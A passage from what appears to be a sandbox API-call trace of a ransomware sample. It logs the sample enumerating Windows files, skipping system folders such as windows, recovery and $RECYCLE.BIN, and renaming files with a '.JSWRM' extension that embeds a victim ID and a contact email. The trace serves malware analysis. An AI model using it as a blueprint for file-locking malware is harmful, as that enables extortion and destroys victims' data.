lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0068.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0068.590] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.590] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10088190985886488) returned 0 [0068.590] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.590] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.590] CloseHandle (hObject=0xffffffff) returned 1 [0068.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0068.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0068.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0068.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0068.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0068.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0068.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.591] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0068.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0068.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0068.591] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.591] FindClose (in: hFindFile=0x2321c0 | out: hFindFile=0x2321c0) returned 1 [0068.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0068.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.591] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a4376e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1f30e81, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1f30e81, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x19f200, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0068.591] lstrcmpiW (lpString1="micaut.dll", lpString2=".") returned 1 [0068.591] lstrcmpiW (lpString1="micaut.dll", lpString2="..") returned 1 [0068.591] lstrcmpiW (lpString1="micaut.dll", lpString2="...") returned 1 [0068.591] lstrcmpiW (lpString1="micaut.dll", lpString2="windows") returned -1 [0068.591] lstrcmpiW (lpString1="micaut.dll", lpString2="recovery") returned -1 [0068.591] lstrcmpiW (lpString1="micaut.dll", lpString2="perflogs") returned -1 [0068.591] lstrcmpiW (lpString1="micaut.dll", lpString2="documents and settings") returned 1 [0068.591] lstrcmpiW (lpString1="micaut.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.591] lstrcmpiW (lpString1="micaut.dll", lpString2="system volume information") returned -1 [0068.591] lstrcmpiW (lpString1="micaut.dll", lpString2="msocache") returned -1 [0068.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="micaut.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="micaut.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="micaut.dll", lpUsedDefaultChar=0x0) returned 10 [0068.591] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0068.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="micaut.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="micaut.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="micaut.dll", lpUsedDefaultChar=0x0) returned 10 [0068.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0068.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.592] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463d4edd, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xc2004e62, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463d4edd, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x7b000, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Microsoft.Ink.dll", cAlternateFileName="")) returned 1 [0068.592] lstrcmpiW (lpString1="Microsoft.Ink.dll", lpString2=".") returned 1 [0068.592] lstrcmpiW (lpString1="Microsoft.Ink.dll", lpString2="..") returned 1 [0068.592] lstrcmpiW (lpString1="Microsoft.Ink.dll", lpString2="...") returned 1 [0068.592] lstrcmpiW (lpString1="Microsoft.Ink.dll", lpString2="windows") returned -1 [0068.592] lstrcmpiW (lpString1="Microsoft.Ink.dll", lpString2="recovery") returned -1 [0068.592] lstrcmpiW (lpString1="Microsoft.Ink.dll", lpString2="perflogs") returned -1 [0068.592] lstrcmpiW (lpString1="Microsoft.Ink.dll", lpString2="documents and settings") returned 1 [0068.592] lstrcmpiW (lpString1="Microsoft.Ink.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.592] lstrcmpiW (lpString1="Microsoft.Ink.dll", lpString2="system volume information") returned -1 [0068.592] lstrcmpiW (lpString1="Microsoft.Ink.dll", lpString2="msocache") returned -1 [0068.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Ink.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0068.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Ink.dll", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Ink.dll", lpUsedDefaultChar=0x0) returned 17 [0068.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Ink.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.592] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Ink.dll", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Ink.dll", lpUsedDefaultChar=0x0) returned 17 [0068.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0068.592] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a4376e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd51e08b5, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd51e08b5, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x178200, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="mip.exe", cAlternateFileName="")) returned 1 [0068.592] lstrcmpiW (lpString1="mip.exe", lpString2=".") returned 1 [0068.592] lstrcmpiW (lpString1="mip.exe", lpString2="..") returned 1 [0068.593] lstrcmpiW (lpString1="mip.exe", lpString2="...") returned 1 [0068.593] lstrcmpiW (lpString1="mip.exe", lpString2="windows") returned -1 [0068.593] lstrcmpiW (lpString1="mip.exe", lpString2="recovery") returned -1 [0068.593] lstrcmpiW (lpString1="mip.exe", lpString2="perflogs") returned -1 [0068.593] lstrcmpiW (lpString1="mip.exe", lpString2="documents and settings") returned 1 [0068.593] lstrcmpiW (lpString1="mip.exe", lpString2="$RECYCLE.BIN") returned 1 [0068.593] lstrcmpiW (lpString1="mip.exe", lpString2="system volume information") returned -1 [0068.593] lstrcmpiW (lpString1="mip.exe", lpString2="msocache") returned -1 [0068.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mip.exe", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0068.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mip.exe", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mip.exe", lpUsedDefaultChar=0x0) returned 7 [0068.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mip.exe", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0068.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mip.exe", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mip.exe", lpUsedDefaultChar=0x0) returned 7 [0068.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0068.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.593] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a1d507, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xde1acd8d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xde1acd8d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x612e00, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="mraut.dll", cAlternateFileName="")) returned 1 [0068.593] lstrcmpiW (lpString1="mraut.dll", lpString2=".") returned 1 [0068.593] lstrcmpiW (lpString1="mraut.dll", lpString2="..") returned 1 [0068.593] lstrcmpiW (lpString1="mraut.dll", lpString2="...") returned 1 [0068.593] lstrcmpiW (lpString1="mraut.dll", lpString2="windows") returned -1 [0068.593] lstrcmpiW (lpString1="mraut.dll", lpString2="recovery") returned -1 [0068.593] lstrcmpiW (lpString1="mraut.dll", lpString2="perflogs") returned -1 [0068.593] lstrcmpiW (lpString1="mraut.dll", lpString2="documents and settings") returned 1 [0068.593] lstrcmpiW (lpString1="mraut.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.593] lstrcmpiW (lpString1="mraut.dll", lpString2="system volume information") returned -1 [0068.593] lstrcmpiW (lpString1="mraut.dll", lpString2="msocache") returned -1 [0068.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0068.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mraut.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mraut.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mraut.dll", lpUsedDefaultChar=0x0) returned 9 [0068.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0068.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mraut.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.593] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mraut.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mraut.dll", lpUsedDefaultChar=0x0) returned 9 [0068.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.593] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.594] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3a52f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3c3a52f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3c3a52f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc800, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="mshwgst.dll", cAlternateFileName="")) returned 1 [0068.594] lstrcmpiW (lpString1="mshwgst.dll", lpString2=".") returned 1 [0068.594] lstrcmpiW (lpString1="mshwgst.dll", lpString2="..") returned 1 [0068.594] lstrcmpiW (lpString1="mshwgst.dll", lpString2="...") returned 1 [0068.594] lstrcmpiW (lpString1="mshwgst.dll", lpString2="windows") returned -1 [0068.594] lstrcmpiW (lpString1="mshwgst.dll", lpString2="recovery") returned -1 [0068.594] lstrcmpiW (lpString1="mshwgst.dll", lpString2="perflogs") returned -1 [0068.594] lstrcmpiW (lpString1="mshwgst.dll", lpString2="documents and settings") returned 1 [0068.594] lstrcmpiW (lpString1="mshwgst.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.594] lstrcmpiW (lpString1="mshwgst.dll", lpString2="system volume information") returned -1 [0068.594] lstrcmpiW (lpString1="mshwgst.dll", lpString2="msocache") returned -1 [0068.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0068.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mshwgst.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mshwgst.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshwgst.dll", lpUsedDefaultChar=0x0) returned 11 [0068.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0068.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mshwgst.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mshwgst.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshwgst.dll", lpUsedDefaultChar=0x0) returned 11 [0068.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.594] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.594] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ce781, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe3805ad4, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe3805ad4, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x106a00, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="mshwLatin.dll", cAlternateFileName="")) returned 1 [0068.594] lstrcmpiW (lpString1="mshwLatin.dll", lpString2=".") returned 1 [0068.594] lstrcmpiW (lpString1="mshwLatin.dll", lpString2="..") returned 1 [0068.594] lstrcmpiW (lpString1="mshwLatin.dll", lpString2="...") returned 1 [0068.594] lstrcmpiW (lpString1="mshwLatin.dll", lpString2="windows") returned -1 [0068.594] lstrcmpiW (lpString1="mshwLatin.dll", lpString2="recovery") returned -1 [0068.594] lstrcmpiW (lpString1="mshwLatin.dll", lpString2="perflogs") returned -1 [0068.594] lstrcmpiW (lpString1="mshwLatin.dll", lpString2="documents and settings") returned 1 [0068.594] lstrcmpiW (lpString1="mshwLatin.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.594] lstrcmpiW (lpString1="mshwLatin.dll", lpString2="system volume information") returned -1 [0068.594] lstrcmpiW (lpString1="mshwLatin.dll", lpString2="msocache") returned -1 [0068.594] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.594] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mshwLatin.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0068.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mshwLatin.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshwLatin.dll", lpUsedDefaultChar=0x0) returned 13 [0068.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mshwLatin.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0068.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mshwLatin.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshwLatin.dll", lpUsedDefaultChar=0x0) returned 13 [0068.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.595] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076bff5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0068.595] lstrcmpiW (lpString1="nb-NO", lpString2=".") returned 1 [0068.595] lstrcmpiW (lpString1="nb-NO", lpString2="..") returned 1 [0068.595] lstrcmpiW (lpString1="nb-NO", lpString2="...") returned 1 [0068.595] lstrcmpiW (lpString1="nb-NO", lpString2="windows") returned -1 [0068.595] lstrcmpiW (lpString1="nb-NO", lpString2="recovery") returned -1 [0068.595] lstrcmpiW (lpString1="nb-NO", lpString2="perflogs") returned -1 [0068.595] lstrcmpiW (lpString1="nb-NO", lpString2="documents and settings") returned 1 [0068.595] lstrcmpiW (lpString1="nb-NO", lpString2="$RECYCLE.BIN") returned 1 [0068.595] lstrcmpiW (lpString1="nb-NO", lpString2="system volume information") returned -1 [0068.595] lstrcmpiW (lpString1="nb-NO", lpString2="msocache") returned 1 [0068.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0068.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 